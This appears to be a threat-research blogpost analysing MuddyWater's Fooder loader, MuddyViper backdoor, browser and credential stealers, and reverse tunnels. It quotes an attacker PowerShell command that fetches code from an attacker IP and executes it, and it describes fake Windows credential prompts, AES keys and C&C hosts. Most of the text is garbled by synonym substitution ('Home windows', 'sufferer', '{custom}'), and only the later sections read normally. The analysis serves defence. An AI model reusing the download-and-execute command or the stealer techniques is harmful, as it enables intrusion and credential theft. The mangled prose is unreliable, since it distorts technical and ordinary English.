Sample Page Title

ESET researchers have recognized new MuddyWater exercise primarily focusing on organizations in Israel, with one confirmed goal in Egypt. MuddyWater, additionally known as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage group recognized for its persistent focusing on of presidency and important infrastructure sectors, usually leveraging {custom} malware and publicly obtainable instruments. On this marketing campaign, the attackers deployed a set of beforehand undocumented, {custom} instruments with the target of enhancing protection evasion and persistence. Amongst these instruments is a {custom} Fooder loader designed to execute MuddyViper, a C/C++ backdoor. A number of variations of Fooder masquerade because the basic Snake sport, and its inside logic features a {custom} delay perform impressed by the sport’s mechanics, mixed with frequent use of Sleep API calls. These options are meant to delay execution and hinder automated evaluation. MuddyViper allows the attackers to gather system data, execute information and shell instructions, switch information, and exfiltrate Home windows login credentials and browser information. The marketing campaign additionally leverages credential stealers (CE‑Notes and LP‑Notes) and reverse tunneling instruments (go‑socks5), lengthy a favourite of MuddyWater operators.

Though that is our first public blogpost masking MuddyWater, ESET researchers have been monitoring the group for a number of years and have documented its actions in a number of ESET APT Exercise Studies. In contrast to earlier campaigns of MuddyWater, which have been usually noisy and simply detected, the one coated on this blogpost demonstrates a extra targeted, subtle, and refined method.

Key factors of this blogpost:

• MuddyWater builders adopted CNG, the next-generation Home windows cryptographic API, which is exclusive for Iran-aligned teams and considerably atypical throughout the broader risk panorama.
• The group additionally used extra superior methods to deploy MuddyViper, a brand new backdoor, by utilizing a loader (Fooder) that reflectively hundreds it into reminiscence and executes it.
• We offer technical analyses of the instruments used on this marketing campaign, together with MuddyViper, the Fooder loader, the CE-Notes browser-data stealer, the LP-Notes credential stealer, the Blub browser-data stealer, and go‑socks5 reverse tunnels.
• Throughout this marketing campaign, the operators intentionally prevented hands-on-keyboard interactive periods, which is a traditionally noisy method usually characterised by mistyped instructions.

MuddyWater group overview

MuddyWater is a cyberespionage group lively since at the very least 2017, primarily focusing on entities within the Center East and North America. It is without doubt one of the most lively Iran-aligned APT teams tracked by ESET researchers and has hyperlinks to the Ministry of Intelligence and Nationwide Safety of Iran.

The group was first launched to the general public as MuddyWater by Unit 42 in 2017, whose description of the group’s exercise is according to ESET’s profiling – a concentrate on cyberespionage, the usage of malicious paperwork as attachments designed to immediate customers to allow macros and bypass safety controls, and a main focusing on of entities positioned within the Center East.

Notable previous actions embody Operation Quicksand (2020), a cyberespionage marketing campaign focusing on Israeli authorities entities and telecommunications organizations, which exemplifies the group’s evolution from primary phishing techniques to extra superior, multistage operations; and a marketing campaign focusing on political teams and organizations in Türkiye, demonstrating the group’s geopolitical focus, its potential to adapt social engineering techniques to native contexts, and reliance on modular malware and versatile C&C infrastructure.

Moreover its frequent exercise, MuddyWater operations are sometimes noisy. The group is understood for its persistent focusing on of presidency, navy, telecommunications, and important infrastructure sectors, usually utilizing {custom} malware and publicly obtainable instruments to realize entry, keep persistence, and exfiltrate delicate information. Along with focusing on its archenemy, Israel, the group seems to be focusing on nations that keep, or search to strengthen, diplomatic ties with Iran.

ESET has documented a number of campaigns attributed to MuddyWater that spotlight the group’s evolving toolset and shifting operational focus. Whereas the sooner operations relied on broad focusing on and comparatively unsophisticated methods, newer campaigns exhibit indicators of technical refinement and elevated precision.

In March and April 2023, MuddyWater focused an unidentified sufferer in Saudi Arabia by deploying a batch script that downloaded a PowerShell-based backdoor, which was used to obtain and execute arbitrary payloads and subsequently to take away the preliminary payload from disk.

The group carried out a marketing campaign in January and February 2025 that was notable for its operational overlap with Lyceum (an OilRig subgroup), additional detailed on this publication. This newest overlap suggests an evolution in MuddyWater’s modus operandi.

The group’s publicly documented {custom} instruments embody, for instance, the Bugsleep, Blackout, Small Sieve, Mori, and POWERSTATS backdoors, in addition to custom-compiled variants of open-source instruments reminiscent of LaZagne or CrackMapExec. MuddyWater campaigns usually don’t leverage or introduce new instruments, malware, or methods; as a substitute, they’re usually noteworthy as a result of focusing on.

Whereas MuddyWater initially concentrated strictly on cyberespionage, its cooperation with Lyceum led to focusing on of the manufacturing sector via spearphishing. The assault generated appreciable noise and achieved little when it comes to operational aims.

The marketing campaign outlined on this publication reveals what, for MuddyWater, appears to be an unprecedented development in toolset and technical execution.

Victimology

As beforehand talked about, throughout this marketing campaign, MuddyWater primarily focused organizations in Israel, but additionally one in Egypt. Desk 1 lists the victims by nation and vertical. The marketing campaign started on September 30^th, 2024 and concluded on March 18^th, 2025.

Desk 1. Victims by nation and vertical

One fascinating factor to notice in regards to the sufferer within the utilities vertical is that they have been additionally compromised by Lyceum on February 11^th, 2025.

Overlap and cooperation with Lyceum

In early 2025, ESET Analysis recognized an operational overlap between MuddyWater and Lyceum, a subgroup of the Iran-aligned OilRig cyberespionage group, also called HEXANE or Storm-0133. OilRig has been lively since at the very least 2014 and is generally believed to be based mostly in Iran. Instruments that we attribute to Lyceum embody DanBot, Shark, Milan, Marlin, Photo voltaic, Mango, OilForceGTX, and quite a lot of downloaders that leverage professional cloud providers for C&C communication. Now we have beforehand noticed Lyceum focusing on a number of Israeli organizations, together with nationwide and native governmental entities, in addition to organizations within the healthcare sector.

Through the marketing campaign coated right here, MuddyWater carried out a joint sub-campaign with OilRig in January and February 2025, MuddyWater initiated entry via a spearphishing e-mail containing a hyperlink to an installer for the Syncro distant monitoring and administration (RMM) software program. Following the preliminary compromise, the attackers put in an extra RMM software, PDQ, and deployed a {custom} Mimikatz loader disguised as certificates information with .txt file extensions. Primarily based on the noticed exercise, harvested credentials have been most likely utilized by Lyceum to realize entry and assume management of operations inside the focused manufacturing-sector group in Israel.

This cooperation means that MuddyWater could also be performing as an preliminary entry dealer for different Iran-aligned teams.

Attribution

The victimology, TTPs, and tooling noticed on this marketing campaign align with a number of of the newly documented capabilities and instruments that we have now beforehand attributed to MuddyWater. This evaluation is predicated on the preliminary entry methodology and the next supply of malicious instruments – usually by way of spearphishing emails that comprise hyperlinks to obtain RMM software program.

TTPs

MuddyWater operators proceed to depend on predictable and script-based backdoors written in PowerShell and Go. Their focusing on stays targeted on the telecommunications, governmental, and oil and vitality sectors.

Preliminary entry is usually achieved via spearphishing emails, usually containing PDF attachments that hyperlink to installers for RMM software program hosted on free file-sharing platforms reminiscent of OneHub, Egnyte, or Mega. These hyperlinks result in the obtain of RMM instruments together with Atera, Stage, PDQ, and SimpleHelp.

Among the many instruments deployed by MuddyWater operators can also be the VAX‑One backdoor, named after the professional software program which it impersonates: Veeam, AnyDesk, Xerox, and the OneDrive updater service.

The group’s continued reliance on this acquainted playbook makes its exercise comparatively straightforward to detect and block.

Instruments overlap

Moreover, we recognized code overlaps between a number of of the newly documented instruments and people we beforehand attributed to MuddyWater:

• LP-Notes, a brand new credential stealer, has the identical design as CE-Notes, a browser-data stealer, that we beforehand related to MuddyWater. Throughout this marketing campaign, we additionally noticed a Mimikatz loader, which shares the identical design and obfuscation strategies as CE-Notes.
• We noticed a number of new variants of MuddyWater’s personalized go‑socks5 reverse tunnels, which the group used all through 2024 and 2025.
• In two situations, we noticed the personalized go‑socks5 reverse tunnels embedded in a brand new MuddyWater loader, internally named Fooder. In a dozen different circumstances, this loader was used to load MuddyWater’s new backdoor, MuddyViper.
• Apparently, MuddyViper and the CE-Notes/LP-Notes/Mimikatz loader variants use the CNG API for information encryption and decryption. To the perfect of our information, that is distinctive to Iran-aligned teams. One other trait these instruments share is that they try to steal person credentials by opening a faux Home windows Safety dialog.

Toolset

On this blogpost, we doc beforehand unknown, {custom} instruments utilized by MuddyWater:

• Fooder loader – a newly recognized loader that hundreds the MuddyViper backdoor into reminiscence and executes it. Notice that a number of variations of Fooder masquerade because the basic Snake sport, therefore the designation, MuddyViper. One other notable attribute of Fooder is its frequent use of a {custom} delay perform that implements the core logic of the Snake sport, mixed with Sleep API calls. These options are meant to delay execution in an try to cover malicious conduct from automated evaluation programs.
• MuddyViper backdoor – a beforehand undocumented C/C++ backdoor that permits attackers to gather system data, obtain and add information, execute information and shell instructions, and steal Home windows credentials and browser information.

The remainder of the toolset documented on this blogpost contains:

• CE-Notes, a browser-data stealer,
• LP-Notes, a credential stealer,
• Blub, a browser-data stealer, and
• a number of go‑socks5 reverse tunnels.

Fooder loader

Fooder is a 64-bit C/C++ loader designed to decrypt after which reflectively load the embedded payload (as illustrated in Determine 1), with MuddyViper being probably the most often noticed payload.

Fooder appears to be the interior identify of this software, based mostly on its PDB paths:

• C:UserswinDesktopFooderDebugLauncher.pdb
• C:UserspcDesktopmainMy_ProjectFooderx64DebugLauncher.pdb

Though we have now solely captured one pattern of it, we imagine that Fooder is executed by a easy launcher utility, written in C. It has no string obfuscation and verbose logging to the console, and the PDB path left intact:

C:UserspcsourcereposConsoleApplication7x64ReleaseConsoleApplication7.pdb

Now we have noticed one occasion (SHA-1: 76632910CF67697BF5D7285FAE38BFCF438EC082) of the part launching Fooder. Deployed below the identify %USERPROFILEpercentDownloadsOsUpdater.exe, the launcher expects a course of ID as a command line argument. As soon as executed, it makes an attempt to duplicate the token of the required course of by way of the DuplicateTokenEx API, after which makes use of CreateProcessAsUserA to execute Fooder.

As soon as executed, Fooder decrypts the embedded payload following these steps:

• The command line argument (6) is added to every byte of a hardcoded key, which produces the AES decryption key, shared throughout all samples, 6969697820511281801712341067111416133321394945138510872296106446.
• A hardcoded worth (5) is subtracted from every byte of the hardcoded payload.
• Lastly, the hardcoded payload is decrypted utilizing the WinCrypt API and the AES key.

Fooder then hundreds the payload immediately into reminiscence utilizing reflective methods, permitting it to execute with out counting on commonplace system calls or writing to disk.

As soon as launched thus, Fooder has been used to ship not solely MuddyViper but additionally HackBrowserData, an open-source utility able to decrypting and exporting delicate browser data reminiscent of credentials and cookies. Fooder additionally facilitates the deployment of go‑socks5 variants, that are Go-compiled binaries that perform as reverse tunnels, enabling attackers to bypass firewalls and Community Deal with Translation (NAT) mechanisms. Notably, the MuddyWater group has beforehand utilized go‑socks5 independently of Fooder, indicating a continued reliance on this software for stealthy community communication and information exfiltration.

Notice that a number of variations of Fooder masquerade because the Snake sport – see the strings and mutexes highlighted in Determine 2 – its most often embedded payload.

One other notable attribute of Fooder is its frequent use of a {custom} delay perform (which implements the core logic of the Snake sport, the place the participant maneuvers the tip of a rising line, usually themed as a snake, to keep away from obstacles and acquire gadgets) and the Sleep API calls. The delay in execution is achieved by mimicking the loop-based delay perform: as within the Snake sport, the place every motion is managed by a loop that waits for a brief interval earlier than updating the sport. The loop introduces execution delays that decelerate the malware’s conduct, serving to it to evade instruments that monitor for speedy malicious exercise. Determine 3 highlights the delays and the Snake sport welcome banner introduced to the person at runtime.

Fooder doesn’t have any built-in persistence functionality. Nonetheless, in circumstances when Fooder’s remaining payload is the MuddyViper backdoor, the backdoor can arrange persistence for the loader by way of a scheduled activity or the Startup folder.

MuddyViper backdoor

MuddyViper, a beforehand undocumented backdoor written in C and C++, allows gaining covert entry and management over compromised programs. Now we have noticed MuddyViper solely in reminiscence, loaded by Fooder, which may be the explanation there isn’t any obfuscation or string encryption. As is typical for MuddyWater, MuddyViper sends extraordinarily verbose and frequent standing messages to its C&C server all through its execution, reminiscent of the next:

• [+] Persist: ——————– Hello,I’m Dwell ——————–
• [+] Persist: ——————– Hello,First Time ——————–
• [-] Persist: failed Create activity !!!!

The backdoor additionally retains a prolonged checklist of 150+ course of names and particulars in regards to the respective merchandise to have the ability to ship detailed experiences in regards to the safety instruments detected within the compromised atmosphere, although including the main points may have been simply carried out on the server aspect:

• [>] Course of: aciseagent.exe ~~> (Cisco Umbrella Roaming Safety) –> (Safety DNS) discovered!
• [>] Course of: acnamagent.exe ~~> (Absolute Persistence) –> (Asset Administration) discovered!
• [>] Course of: acnamlogonagent.exe ~~> (Absolute Persistence) –> (Asset Administration) discovered!

This conduct leads to substantial community visitors.

MuddyViper has two strategies of creating persistence:

• A scheduled activity named ManageOnDriveUpdater can launch MuddyViper from the trail on every system begin.

MuddyViper helps 20 backdoor instructions – see Desk 2 for particulars of all of them – notably together with the power to open and function reverse shells, obtain, add, and execute information, report the operating safety instruments, steal person credentials and information from quite a lot of browsers, arrange its personal persistence, and uninstalling itself.

Desk 2. MuddyViper backdoor instructions

One of many instructions listed in Desk 2, with ID 805, shows a faux Home windows Safety dialog in an try to entice the sufferer into filling of their Home windows credentials, as seen in Determine 4. An identical method is utilized by MuddyWater’s LP-Notes stealer (see LP-Notes credential stealer).

One other command, with ID 900, goals to take away MuddyViper from the compromised machine and clear its persistence; nevertheless, the command doesn’t take away all traces of the backdoor.

Community protocol

To speak with its C&C server, MuddyViper makes use of HTTP GET requests (by way of the WinHTTP API) over port 443, with the WINHTTP_FLAG_SECURE flag configured to make use of SSL/TLS. Two C&C servers have been noticed: processplanet[.]org and 35.175.224[.]64.

Each instructions of communication AES-CBC encrypt the info, utilizing the CNG API with the important thing (used throughout samples) 0608101047106453101617106423101013101012101083109710108585106969 and the IV 0.

Within the backdoor → server course of the communications:

• Every endpoint URI supported by the C&C server can be utilized by the backdoor for a particular kind of request, reminiscent of requesting a command, importing a file, or sending a {custom} standing message.
• Extra information for the C&C server is included within the HTTP request physique, which is unconventional for HTTP GET requests.
• The Consumer-Agent string is A WinHTTP Instance Program/1.0, a remnant of the instance code for the WinHttpOpen API.
• The connection, ship, obtain, and response timeouts are set to 30 seconds.
• Default sleep time between consecutive connection makes an attempt is 60 seconds. This worth will be configured by command ID 700.
• Upon failure, connection makes an attempt are retried as much as 10 occasions.
• Previous to encryption, the info is at all times formatted as <computer_name>/<username>*<information>.

Within the server → backdoor course of the communications:

• The HTTP standing code determines the backdoor command ID.
• The backdoor command arguments are included within the HTTP response physique.

CE-Notes browser-data stealer

CE-Notes is a browser-data stealer that we named after the filename – ce-notes.txt – used to stage stolen information on disk. We found CE-Notes in 2024 once we noticed MuddyWater deploying EXE and DLL variations of it on the system of a corporation in Israel.

CE-Notes was downloaded with the next PowerShell command:

“C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe” (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149[.]51:443/57576?filter_relational_operator_2=60169).content material | Invoke-Expression

Each variations of the browser-data stealer try to steal and decrypt the app-bound encryption key saved within the Native State file (%APPDATApercentLocalGoogleChromeUser DataLocal State) of Chromium browsers (Chrome, Courageous, and Edge). App-bound encryption was launched in Chrome model 127, enabling Chrome to encrypt information tied to app id. Cybercriminals and APT teams have caught on and are actively making an attempt to work round app-bound encryption to steal session keys. CE-Notes is sort of much like ChromElevator on GitHub.

The collected information is AES-CBC encrypted utilizing the CNG API with the important thing 9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F and the IV 4103A09887B82FFD56A93BB431805224.

Then the encrypted information is saved on disk in C:UsersPublicDownloadsce-notes.txt for later retrieval (most likely by way of an RMM software, since neither the EXE nor the DLL variations have any technique of exfiltrating the file). The first distinction between the EXE and the DLL is the digital machine evasion performance added to the DLL.

We noticed the CE-Notes browser-data stealer within the following areas:

• C:system2.dll
• C:UsersPublicDownloadssystem2.dll
• C:Intelsystem.dll
• C:20240926_165509.exe

LP-Notes credential stealer

LP-Notes is a C/C++ Home windows credential stealer with the identical design because the CE-Notes browser-data stealer. Following the identical naming conference as within the case of CE-Notes, we named the stealer LP-Notes based mostly on the native file it makes use of to stage stolen credentials earlier than exfiltration: C:UsersPublicDownloadslp-notes.txt (vs. C:UsersPublicDownloadsce-notes.txt). The only real function of LP-Notes is to entice victims into submitting their credentials by displaying a faux Home windows Safety dialog, prompting them to enter their Home windows username and password. Now we have noticed an occasion of LP-Notes being downloaded and executed by PowerShell with a really comparable command line to that proven within the CE-Notes part.

Initialization

On execution, LP-Notes begins by looking for a course of named taskhostw.exe (Host Course of for Home windows Duties) after which impersonating the safety context of the method (by way of the ImpersonateLoggedOnUser API); solely then does LP-Notes activate its malicious payload.

LP-Notes employs a number of easy obfuscation methods, together with a {custom}, addition-based routine for string decryption. Determine 5 reveals the perform that decrypts strings of lengths starting from 15 to 19 characters, although the decryption key’s at all times the identical – a set of predefined constants which might be added or subtracted from every byte of the string. Apparently, CE-Notes makes use of the identical decryption routine, apart from a unique decryption key, as proven in Determine 6.

LP-Notes makes use of string stacking for strings shorter than 15 or longer than 19 characters, together with the decryption key, IV, and import names. Lastly, to obscure the usage of Home windows API features and to make static evaluation tougher, LP-Notes dynamically resolves the API features throughout the C runtime startup, earlier than the execution of the WinMain perform, the usual entry level for a graphical Home windows-based utility per Microsoft, thus hiding direct references to the API features from pseudocode view (see Determine 7).

Capabilities

In an infinite loop, LP-Notes shows a faux Home windows Safety dialog prompting the sufferer to enter their Home windows username and password, as proven in Determine 8 (by way of the CredUIPromptForWindowsCredentialsW API). Notice that though comparable, this isn’t the identical because the faux credential immediate utilized by MuddyViper (see Determine 4). It instantly confirms the validity of any submitted credentials by trying to go online as that person (by way of the CredUnPackAuthenticationBufferW and LogonUserW APIs).

If profitable, the harvested credentials are then AES-CBC encrypted utilizing the CNG API with the important thing ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC and the IV 91A4E6F6D51DAEE773A8F00279792578.

Just like CE-Notes, LP-Notes then shops the encrypted credentials in a neighborhood file – on this case C:UsersPublicDownloadslp-notes.txt. As neither of those parts have the aptitude to exfiltrate information, one other part presumably handles this (both an RMM software or MuddyViper).

Blub browser-data stealer

Blub is a C/C++ browser-data stealer incorporating a statically linked SQLite library. The identify is derived from its filename, Blub.exe. We noticed the PDB path C:Usersjojosourcereposstealerx64Releasestealer.pdb. It steals person login information from Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera net browsers.

Chromium-based browsers

For Chrome, Blub first terminates chrome.exe (if operating) after which parses and decrypts the encryption key from C:Customers<username>AppDataLocalGoogleChromeUser DataLocal State. This key’s used to encrypt delicate information saved by Chrome, reminiscent of passwords or cookies, and it’s protected by the Knowledge Safety API (DPAPI) in order that it will possibly solely be decrypted on the system the place it was initially encrypted. Blub decrypts this key by way of the CryptUnprotectData API, after which makes use of it to decrypt person credentials obtained from all present Chrome person profiles on the compromised laptop. The credentials, saved in C:Customers<username>AppDataLocalGoogleChromeUser Knowledge<profile_name>Login Knowledge, are obtained by way of the next SQL question:

SELECT origin_url, username_value, password_value FROM logins

An identical collection of steps is used to acquire and decrypt person credentials from Microsoft Edge and Opera person profiles, utilizing the important thing obtained from C:Customers<username>AppDataLocalMicrosoftEdgeUser DataLocal State and C:Customers<username>AppDataRoamingOpera SoftwareOpera StableLocal State, respectively.

Firefox

Lastly, to decrypt saved person credentials for Mozilla Firefox, Blub parses the hostname, encryptedUsername, and encryptedPassword values from the logins.json file in every person’s profile listing, i.e., %APPDATAROAMINGpercentMozillaFirefoxProfiles<profile_name>. The credentials are then decrypted utilizing the PK11SDR_Decrypt perform from the nss3.dll library utilized by Firefox.

The collected information is saved into a neighborhood file named file.txt, with no encryption. The identical information is logged onto the console, with no encryption, together with verbose standing messages. Blub has no functionality to exfiltrate this file.

Notice that Blub checks for operating processes related to safety options earlier than executing its malicious payload, specializing in the mixture of afwServ.exe (Avast firewall) and AvastSvc.exe (Avast antivirus) processes. If afwServ.exe is detected operating (however not AvastSvc.exe), Blub concludes that Norton is operating (which now makes use of the Avast engine) on the compromised host, and exits. If AvastSvc.exe (Avast) is detected, Blub continues with the execution, besides it skips stealing credentials from Microsoft Edge.

Whereas Blub’s strings are saved in cleartext, a easy obfuscation method is used for strings related to the Google Chrome information stealer performance. Particularly, a number of strings are concatenated into one lengthy string, with 16 random characters between them, apparently to cover them from view throughout static evaluation:

gdGlog}o{eRwjpw&”encrypted_key”:FAe[b-vcJvxGImpersonateLoggehgdOvlgt_NxuoolOpenProcessTokenVLUKKW’xxqjpwe}uDuplicateTokenExs5&}vleIpuvvkdXznx(Ghn2(sh|y⌂ryme~ds~

Removing the junk characters and splitting the strings returns:

• “encrypted_key”:
• ImpersonateLogge
• OpenProcessToken
• DuplicateTokenEx

go‑socks5 reverse tunnels

MuddyWater’s go‑socks5 reverse tunnels are a collection of Go-compiled tools, based on publicly available libraries such as go‑socks5, yamux, and resocks; they have been frequently used in MuddyWater’s recent campaigns.

Most of the variants we analyzed appear to be internally named ESETGO (no relation to ESET), based on the build configuration strings shown in Figure 9 and in other artifacts.

path  ESETGO
mod   ESETGO	(devel)
dep   github.com/armon/go-socks5	v0.0.0-20160902184237-e75332964ef5h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=
dep	  github.com/hashicorp/yamux	v0.1.1	h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=
dep	  golang.org/x/net	v0.29.0	h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=
dep	  golang.org/x/sys	v0.25.0	h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=
build -buildmode=exe
build -compiler=gc
build -ldflags="-w -s"
build CGO_ENABLED=1
build CGO_CFLAGS=
build CGO_CPPFLAGS=
build CGO_CXXFLAGS=
build CGO_LDFLAGS=
build GOARCH=amd64
build GOOS=windows
build GOAMD64=v1

Figure 9. Build configuration strings from MuddyWater’s go‑socks5 variants

The primary purpose of MuddyWater’s go‑socks5 proxy is to relay communication between the compromised machine (on a specific port) and a hardcoded C&C server, using a hardcoded connection key to authenticate with the C&C server via SSL/TLS. This setup allows the attacker to route C&C traffic (potentially related to other compromises) through the compromised machine and thus to hide the location of the real C&C server.

Conclusion

This campaign indicates an evolution in the operational maturity of MuddyWater. The deployment of previously undocumented components – such as the Fooder loader and MuddyViper backdoor – signals an effort to enhance stealth, persistence, and credential harvesting capabilities. The use of game-inspired evasion techniques, reverse tunneling, and a diversified toolset reflects a more refined approach than in earlier campaigns, even though traces of the group’s operational immaturity remain.

MuddyWater continues to demonstrate the ability to execute campaigns ranging from average to above average, i.e., being timely, effective, and increasingly challenging to defend against. While we assess that MuddyWater will remain a leading actor in Iranian-nexus activity, we anticipate a continued pattern of typical campaigns enhanced by more advanced TTPs.

ESET will continue to monitor the group’s activities, focusing on further signs of technical advancement and strategic targeting of government, military, telecommunications, and critical infrastructure.

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. 

ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

Files

Network

MITRE ATT&CK methods

This desk was constructed utilizing model 17 of the MITRE ATT&CK framework.